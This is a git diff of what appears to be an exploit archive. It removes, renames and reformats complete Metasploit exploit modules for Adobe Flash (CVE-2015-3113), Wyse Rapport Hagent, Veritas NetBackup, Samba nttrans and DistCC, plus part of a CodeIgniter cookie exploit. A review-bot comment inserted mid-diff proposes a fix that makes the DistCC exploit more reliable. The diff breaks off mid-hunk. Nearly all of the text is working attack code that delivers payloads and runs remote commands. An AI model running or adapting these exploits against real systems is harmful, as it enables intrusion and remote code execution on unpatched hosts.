- unless errored - print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, payload_file), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}" - ) - end - end - - # - # Take a CodeIgnitor cookie and pull out the PHP object using the XOR - # key that we've been given. - # - def decode_cookie(cookie_content) - cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content)) - pass = xor(cookie_value, datastore['XORKEY']) - result = '' - - (0...pass.length).step(2).each do |i| - result << (pass[i].ord ^ pass[i + 1].ord).chr - end - - result - end - - # - # Take a serialised PHP object cookie value and encode it so that - # CodeIgniter thinks it's legit. - # - def encode_cookie(cookie_value) - rand = Rex::Text.sha1(rand_text_alphanumeric(40)) - - block = '' - - (0...cookie_value.length).each do |i| - block << rand[i % rand.length] - block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr - end - - cookie_value = xor(block, datastore['XORKEY']) - cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("Cookie value: #{cookie_value}") - - cookie_value - end - - # - # XOR a value against a key. The key is cycled. - # - def xor(string, key) - result = '' - - string.bytes.zip(key.bytes.cycle).each do |s, k| - result << (s ^ k) - end - - result - end - - # - # Simple XML substitution because the target XML handler isn't really - # full blown or smart. - # - def xml_encode(str) - str.gsub(//, '>') - end - -end \ No newline at end of file diff --git a/platforms/multiple/local/41682.rb b/platforms/multiple/local/30474.rb similarity index 100% rename from platforms/multiple/local/41682.rb rename to platforms/multiple/local/30474.rb diff --git a/platforms/multiple/local/41681.rb b/platforms/multiple/local/41681.rb deleted file mode 100755 index 169e8db11..000000000 
--- a/platforms/multiple/local/41681.rb
+++ /dev/null
@@ -1,191 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::BrowserExploitServer - - def initialize(info={}) - super(update_info(info, - 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', - 'Description' => %q{ - This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser - encoded audio inside a FLV video, as exploited in the wild on June 2015. This module - has been tested successfully on: - Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, - Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, - Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, - Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and - Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. - Note that this exploit is effective against both CVE-2015-3113 and the - earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression - to the same root cause as CVE-2015-3043. 
- }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Unknown', # Exploit in the wild - 'juan vazquez' # msf module - ], - 'References' => - [ - ['CVE', '2015-3043'], - ['CVE', '2015-3113'], - ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], - ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], - ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], - ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], - ['URL', 'http://bobao.360.cn/learning/detail/357.html'] - ], - 'Payload' => - { - 'DisableNops' => true - }, - 'Platform' => ['win', 'linux'], - 'Arch' => [ARCH_X86], - 'BrowserRequirements' => - { - :source => /script|headers/i, - :arch => ARCH_X86, - :os_name => lambda do |os| - os =~ OperatingSystems::Match::LINUX || - os =~ OperatingSystems::Match::WINDOWS_7 || - os =~ OperatingSystems::Match::WINDOWS_81 - end, - :ua_name => lambda do |ua| - case target.name - when 'Windows' - return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF - when 'Linux' - return true if ua == Msf::HttpClients::FF - end - - false - end, - :flash => lambda do |ver| - case target.name - when 'Windows' - return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') - return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') - when 'Linux' - return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') - end - - false - end - }, - 'Targets' => - [ - [ 'Windows', - { - 'Platform' => 'win' - } - ], - [ 'Linux', - { - 'Platform' => 'linux' - } - ] - ], - 'Privileged' => false, - 'DisclosureDate' => 'Jun 23 2015', - 'DefaultTarget' => 0)) - end - - def exploit - @swf = create_swf - @flv = create_flv - - super - end - - def on_request_exploit(cli, 
request, target_info) - print_status("Request: #{request.uri}") - - if request.uri =~ /\.swf$/ - print_status('Sending SWF...') - send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) - return - end - - if request.uri =~ /\.flv$/ - print_status('Sending FLV...') - send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) - return - end - - print_status('Sending HTML...') - send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) - end - - def exploit_template(cli, target_info) - swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" - target_payload = get_payload(cli, target_info) - b64_payload = Rex::Text.encode_base64(target_payload) - os_name = target_info[:os_name] - - if target.name =~ /Windows/ - platform_id = 'win' - elsif target.name =~ /Linux/ - platform_id = 'linux' - end - - html_template = %Q| - - - - - - - - - - - | - - return html_template, binding() - end - - def create_swf - path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') - swf = ::File.open(path, 'rb') { |f| swf = f.read } - - swf - end - - def create_flv - header = '' - header << 'FLV' # signature - header << [1].pack('C') # version - header << [4].pack('C') # Flags: TypeFlagsAudio - header << [9].pack('N') # DataOffset - - data = '' - data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 - data << "\xee" * 0x440 # SoundData - - tag1 = '' - tag1 << [8].pack('C') # TagType (audio) - tag1 << "\x00\x04\x41" # DataSize - tag1 << "\x00\x00\x1a" # TimeStamp - tag1 << [0].pack('C') # TimeStampExtended - tag1 << "\x00\x00\x00" # StreamID, always 0 - tag1 << data - - body = '' - body << [0].pack('N') # PreviousTagSize - body << tag1 - body << [0xeeeeeeee].pack('N') # PreviousTagSize - - flv = '' - flv << header - flv << body - - flv - end -end \ No newline at end of 
file
diff --git a/platforms/multiple/remote/16287.rb b/platforms/multiple/remote/16287.rb
deleted file mode 100755
index e3ba4258c..000000000
--- a/platforms/multiple/remote/16287.rb
+++ /dev/null
@@ -1,251 +0,0 @@ -## -# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'timeout' -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::FtpServer - include Msf::Exploit::EXE - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution', - 'Description' => %q{ - This module exploits the Wyse Rapport Hagent service by pretending to - be a legitimate server. This process involves starting both HTTP and - FTP services on the attacker side, then contacting the Hagent service of - the target and indicating that an update is available. The target will - then download the payload wrapped in an executable from the FTP service. 
- }, - 'Stance' => Msf::Exploit::Stance::Aggressive, - 'Author' => 'kf', - 'Version' => '$Revision: 10998 $', - 'References' => - [ - ['CVE', '2009-0695'], - ['OSVDB', '55839'], - ['US-CERT-VU', '654545'], - ['URL', 'http://snosoft.blogspot.com/'], - ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'], - ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], - ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], - ], - 'Privileged' => true, - 'Payload' => - { - 'Space' => 2048, - 'BadChars' => '', - }, - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Targets' => - [ - [ 'Windows XPe x86',{'Platform' => 'win',}], - [ 'Wyse Linux x86', {'Platform' => 'linux',}], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jul 10 2009' - )) - - register_options( - [ - OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), - Opt::RPORT(80), - ], self.class) - end - - - def exploit - - if(datastore['SRVPORT'].to_i != 21) - print_error("This exploit requires the FTP service to run on port 21") - return - end - - # Connect to the target service - print_status("Connecting to the target") - connect() - - # Start the FTP service - print_status("Starting the FTP server") - start_service() - - # Create the executable with our payload - print_status("Generating the EXE") - @exe_file = generate_payload_exe - if target['Platform'] == 'win' - maldir = "C:\\" # Windows - malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe" - co = "XP" - elsif target['Platform'] == 'linux' - maldir = "//tmp//" # Linux - malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin" - co = "LXS" - end - @exe_sent = false - - # Start the HTTP service - print_status("Starting the HTTP service") - wdmserver = Rex::Socket::TcpServer.create({ - 'Context' => { - 'Msf' => framework, - 'MsfExploit' => self - } - }) - - # Let this close automatically - add_socket(wdmserver) - - 
wdmserver_port = wdmserver.getsockname[2] - print_status("Starting the HTTP service on port #{wdmserver_port}") - - - fakerapport = Rex::Socket.source_address(rhost) - fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0] - mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|" - - # FTP Credentials - ftpserver = Rex::Socket.source_address(rhost) - ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1) - ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1) - ftpport = 21 - ftpsecure = '0' - - incr = 10 - pwn1 = - "&UP0|&SI=1|UR=9" + - "|CO \x0f#{co}\x0f|#{incr}" + - # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + - "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" - - pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" - - pwn3 = - "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # "|RB|#{incr+1}" + - # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + - #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # FTP Paramaters - "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + - "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + - "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + - "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + - # No clue - "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" - - if target['Platform'] == 'win' - pwn = pwn1 + pwn3 - elsif target['Platform'] == 'linux' - pwn = pwn1 + pwn2 + pwn3 - end - # Send the malicious request - sock.put(mal) - - # Download some response data - resp = sock.get_once(-1, 10) - print_status("Received: #{resp}") - - if not resp - print_error("No reply from the target, this may not be a vulnerable system") - return - end - - print_status("Waiting on a connection to the HTTP service") - begin - Timeout.timeout(190) do - done = false - while (not 
done and session = wdmserver.accept) - req = session.recvfrom(2000)[0] - next if not req - next if req.empty? - print_status("HTTP Request: #{req.split("\n")[0].strip}") - - case req - when /V01/ - print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") - res = pwn - when /V02/ - print_status("++ device sending V02 query...") - res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" - done = true - - when /V55/ - print_status("++ device sending V55 query...") - res = pwn - when /POST/ # PUT is used for non encrypted requests. - print_status("++ device sending V55 query...") - res = pwn - done = true - else - print_status("+++ sending generic response...") - res = pwn - end - - print_status("Sending reply: #{res}") - session.put(res) - session.close - end - end - rescue ::Timeout::Error - print_status("Timed out waiting on the HTTP request") - wdmserver.close - disconnect() - stop_service() - return - end - - print_status("Waiting on the FTP request...") - stime = Time.now.to_f - while(not @exe_sent) - break if (stime + 90 < Time.now.to_f) - select(nil, nil, nil, 0.25) - end - - if(not @exe_sent) - print_status("No executable sent :(") - end - - stop_service() - wdmserver.close() - - handler - disconnect - end - - def on_client_command_retr(c,arg) - print_status("#{@state[c][:name]} FTP download request for #{arg}") - conn = establish_data_connection(c) - if(not conn) - c.put("425 Can't build data connection\r\n") - return - end - - c.put("150 Opening BINARY mode data connection for #{arg}\r\n") - conn.put(@exe_file) - c.put("226 Transfer complete.\r\n") - conn.close - @exe_sent = true - end - - def on_client_command_size(c,arg) - print_status("#{@state[c][:name]} FTP size request for #{arg}") - c.put("213 #{@exe_file.length}\r\n") - end - - -end - diff --git a/platforms/multiple/remote/16290.rb b/platforms/multiple/remote/16290.rb deleted file mode 100755 index 820f93a2a..000000000 
--- a/platforms/multiple/remote/16290.rb
+++ /dev/null
@@ -1,97 +0,0 @@ -## -# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'VERITAS NetBackup Remote Command Execution', - 'Description' => %q{ - This module allows arbitrary command execution on an - ephemeral port opened by Veritas NetBackup, whilst an - administrator is authenticated. The port is opened and - allows direct console access as root or SYSTEM from - any source address. - }, - 'Author' => [ 'patrick' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 10617 $', - 'References' => - [ - [ 'CVE', '2004-1389' ], - [ 'OSVDB', '11026' ], - [ 'BID', '11494' ], - [ 'URL', 'http://seer.support.veritas.com/docs/271727.htm' ], - - ], - 'Privileged' => true, - 'Platform' => ['unix', 'win', 'linux'], - 'Arch' => ARCH_CMD, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => '', - 'DisableNops' => true, - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl telnet', - } - }, - 'Targets' => - [ - ['Automatic', { }], - ], - 'DisclosureDate' => 'Oct 21 2004', - 'DefaultTarget' => 0)) - end - - def check - connect - - sploit = rand_text_alphanumeric(10) - buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n" - - sock.put(buf) - banner = sock.get(3,3) - - disconnect - - if (banner and banner =~ /#{sploit}/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - sploit = payload.encoded.split(" ") - - buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n" - buf << payload.encoded - buf << "\n" - - 
sock.put(buf) - res = sock.get(-1,3) - - print_status("#{res}") - - handler - disconnect - end - -end diff --git a/platforms/multiple/remote/37536.rb b/platforms/multiple/remote/37536.rb index 37ac7f36f..169e8db11 100755 --- a/platforms/multiple/remote/37536.rb +++ b/platforms/multiple/remote/37536.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer @@ -17,13 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: - Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. - Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043. diff --git a/platforms/multiple/remote/41693.rb b/platforms/multiple/remote/41693.rb deleted file mode 100755 index cf4f7169f..000000000 --- a/platforms/multiple/remote/41693.rb +++ /dev/null 
@@ -1,153 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Remote::SMB::Client - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow', - 'Description' => %q{ - This module attempts to exploit a buffer overflow vulnerability present in - versions 2.2.2 through 2.2.6 of Samba. - The Samba developers report this as: - "Bug in the length checking for encrypted password change requests from clients." - The bug was discovered and reported by the Debian Samba Maintainers. - }, - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2002-1318' ], - [ 'OSVDB', '14525' ], - [ 'BID', '6210' ], - [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ] - ], - 'Privileged' => true, - 'Platform' => 'linux', - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - 'MinNops' => 512, - }, - 'Targets' => - [ - [ "Samba 2.2.x Linux x86", - { - 'Arch' => ARCH_X86, - 'Platform' => 'linux', - 'Rets' => [0x01020304, 0x41424344], - }, - ], - ], - 'DisclosureDate' => 'Apr 7 2003' - )) - - register_options( - [ - Opt::RPORT(139) - ], self.class) - end - - def exploit - - # 0x081fc968 - - pattern = Rex::Text.pattern_create(12000) - - pattern[532, 4] = [0x81b847c].pack('V') - pattern[836, payload.encoded.length] = payload.encoded - - # 0x081b8138 - - connect - smb_login - - targ_address = 0xfffbb7d0 - - # - # Send a NTTrans request with ParameterCountTotal set to the buffer length - # - - subcommand = 1 - param = '' - body = '' - setup_count = 0 - setup_data = '' - data = param + body - - pkt = CONST::SMB_NTTRANS_PKT.make_struct - self.simple.client.smb_defaults(pkt['Payload']['SMB']) - - base_offset = pkt.to_s.length + (setup_count * 2) - 4 - param_offset = base_offset - 
data_offset = param_offset + param.length - - pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT - pkt['Payload']['SMB'].v['Flags1'] = 0x18 - pkt['Payload']['SMB'].v['Flags2'] = 0x2001 - pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count - - pkt['Payload'].v['ParamCountTotal'] =12000 - pkt['Payload'].v['DataCountTotal'] = body.length - pkt['Payload'].v['ParamCountMax'] = 1024 - pkt['Payload'].v['DataCountMax'] = 65504 - pkt['Payload'].v['ParamCount'] = param.length - pkt['Payload'].v['ParamOffset'] = param_offset - pkt['Payload'].v['DataCount'] = body.length - pkt['Payload'].v['DataOffset'] = data_offset - pkt['Payload'].v['SetupCount'] = setup_count - pkt['Payload'].v['SetupData'] = setup_data - pkt['Payload'].v['Subcommand'] = subcommand - - pkt['Payload'].v['Payload'] = data - - self.simple.client.smb_send(pkt.to_s) - ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT) - - # - # Send a NTTrans secondary request with the magic displacement - # - - param = pattern - body = '' - data = param + body - - pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct - self.simple.client.smb_defaults(pkt['Payload']['SMB']) - - base_offset = pkt.to_s.length - 4 - param_offset = base_offset - data_offset = param_offset + param.length - - pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY - pkt['Payload']['SMB'].v['Flags1'] = 0x18 - pkt['Payload']['SMB'].v['Flags2'] = 0x2001 - pkt['Payload']['SMB'].v['WordCount'] = 18 - - pkt['Payload'].v['ParamCountTotal'] = param.length - pkt['Payload'].v['DataCountTotal'] = body.length - pkt['Payload'].v['ParamCount'] = param.length - pkt['Payload'].v['ParamOffset'] = param_offset - pkt['Payload'].v['ParamDisplace'] = targ_address - pkt['Payload'].v['DataCount'] = body.length - pkt['Payload'].v['DataOffset'] = data_offset - - pkt['Payload'].v['Payload'] = data - - self.simple.client.smb_send(pkt.to_s) - ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY) - - - 
handler - - end - -end \ No newline at end of file diff --git a/platforms/multiple/remote/9915.rb b/platforms/multiple/remote/9915.rb index f2415f015..6327cbcee 100755 --- a/platforms/multiple/remote/9915.rb +++ b/platforms/multiple/remote/9915.rb @@ -1,9 +1,9 @@ ## -# $Id$ +# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,20 +14,21 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'DistCC Daemon Command Execution', 'Description' => %q{ This module uses a documented security weakness to execute arbitrary commands on any system running distccd. - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2004-2687'], @@ -36,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Platform' => ['unix'], - 'Arch' => ARCH_CMD, + 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { @@ -48,16 +49,18 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic perl ruby bash telnet', } }, - 'Targets' => + 'Targets' => [ [ 'Automatic Target', { }] ], - 'DefaultTarget' => 0)) - + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 01 2002' + )) + register_options( [ Opt::RPORT(3632) - ], self.class) + ], self.class) end def exploit 
@@ -65,23 +68,24 @@ class Metasploit3 < Msf::Exploit::Remote distcmd = dist_cmd("sh", "-c", payload.encoded); sock.put(distcmd) - + dtag = rand_text_alphanumeric(10) sock.put("DOTI0000000A#{dtag}\n") - + res = sock.get_once(24, 5) - + if !(res and res.length == 24) print_status("The remote distccd did not reply to our request") disconnect return end - + # Check STDERR res = sock.get_once(4, 5) res = sock.get_once(8, 5) len = [res].pack("H*").unpack("N")[0] - + + return if not len if (len > 0) res = sock.get_once(len, 5) res.split("\n").each do |line| @@ -93,34 +97,35 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once(4, 5) res = sock.get_once(8, 5) len = [res].pack("H*").unpack("N")[0] - + + return if not len if (len > 0) res = sock.get_once(len, 5) res.split("\n").each do |line| print_status("stdout: #{line}") end end - + handler disconnect end - - + + # Generate a distccd command def dist_cmd(*args) - + # Convince distccd that this is a compile args.concat(%w{# -c main.c -o main.o}) - + # Set distcc 'magic fairy dust' and argument count res = "DIST00000001" + sprintf("ARGC%.8x", args.length) - + # Set the command arguments args.each do |arg| res << sprintf("ARGV%.8x%s", arg.length, arg) end - + return res end -end +end \ No newline at end of file diff --git a/platforms/multiple/remote/9934.rb b/platforms/multiple/remote/9934.rb index 6d69a4650..e3ba4258c 100755 --- a/platforms/multiple/remote/9934.rb +++ b/platforms/multiple/remote/9934.rb 
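Review bot: The new `return if not len` guard sits after `[res].pack("H*")`, so if `sock.get_once(8, 5)` returns nil on a timeout — which the earlier `if !(res and res.length == 24)` test treats as possible — the pack raises a TypeError before the guard is ever reached; the guard only helps for a short but non-nil read. Checking the read result instead covers both cases: `res = sock.get_once(8, 5)` / `return if not res or res.length < 8` / `len = [res].pack("H*").unpack("N")[0]`. The same ordering is repeated in the stdout block at `@@ -93,34 +97,35 @@`, and in both blocks the subsequent `res = sock.get_once(len, 5)` followed by `res.split("\n")` is still unguarded for a nil result. The enclosing `exploit` method starts outside this hunk.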
@@ -1,35 +1,38 @@ ## -# $Id: hagent_untrusted_hsdata.rb +# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ +# http://metasploit.com/framework/ ## require 'timeout' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::FtpServer + include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution', 'Description' => %q{ - This module exploits the Wyse Rapport Hagent service by pretending to - be a legitimate server. This process involves starting both HTTP and - FTP services on the attacker side, then contacting the Hagent service of - the target and indicating that an update is available. The target will - then download the payload wrapped in an executable from the FTP service. + This module exploits the Wyse Rapport Hagent service by pretending to + be a legitimate server. This process involves starting both HTTP and + FTP services on the attacker side, then contacting the Hagent service of + the target and indicating that an update is available. The target will + then download the payload wrapped in an executable from the FTP service. }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Author' => 'kf', - 'Version' => '$Revision$', - 'References' => + 'Version' => '$Revision: 10998 $', + 'References' => [ ['CVE', '2009-0695'], ['OSVDB', '55839'], 
@@ -39,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], ], + 'Privileged' => true, 'Payload' => { 'Space' => 2048, @@ -48,46 +52,46 @@ class Metasploit3 < Msf::Exploit::Remote { 'EXITFUNC' => 'process', }, - 'Targets' => - [ - [ 'Windows XPe x86',{'Platform' => 'win',}], - [ 'Wyse Linux x86', {'Platform' => 'linux',}], - ], + 'Targets' => + [ + [ 'Windows XPe x86',{'Platform' => 'win',}], + [ 'Wyse Linux x86', {'Platform' => 'linux',}], + ], 'DefaultTarget' => 0, - 'Privileged' => true + 'DisclosureDate' => 'Jul 10 2009' )) - register_options([ - OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), - Opt::RPORT(80), - ], self.class) + register_options( + [ + OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), + Opt::RPORT(80), + ], self.class) end def exploit - + if(datastore['SRVPORT'].to_i != 21) print_error("This exploit requires the FTP service to run on port 21") return end - + # Connect to the target service print_status("Connecting to the target") connect() - + # Start the FTP service print_status("Starting the FTP server") start_service() - + # Create the executable with our payload print_status("Generating the EXE") + @exe_file = generate_payload_exe if target['Platform'] == 'win' - @exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded) maldir = "C:\\" # Windows malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe" co = "XP" elsif target['Platform'] == 'linux' - @exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded) maldir = "//tmp//" # Linux malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin" co = "LXS" 
@@ -102,113 +106,122 @@ class Metasploit3 < Msf::Exploit::Remote 'MsfExploit' => self } }) - + + # Let this close automatically + add_socket(wdmserver) + wdmserver_port = wdmserver.getsockname[2] print_status("Starting the HTTP service on port #{wdmserver_port}") - - + + fakerapport = Rex::Socket.source_address(rhost) fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0] mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|" - # FTP Credentials + # FTP Credentials ftpserver = Rex::Socket.source_address(rhost) ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1) ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1) ftpport = 21 ftpsecure = '0' - incr = 10 - pwn1 = - "&UP0|&SI=1|UR=9" + - "|CO \x0f#{co}\x0f|#{incr}" + - # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + - "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + incr = 10 + pwn1 = + "&UP0|&SI=1|UR=9" + + "|CO \x0f#{co}\x0f|#{incr}" + + # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + + "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" - pwn2 = - "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" + pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" - pwn3 = - "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # "|RB|#{incr+1}" + - # "|SV* 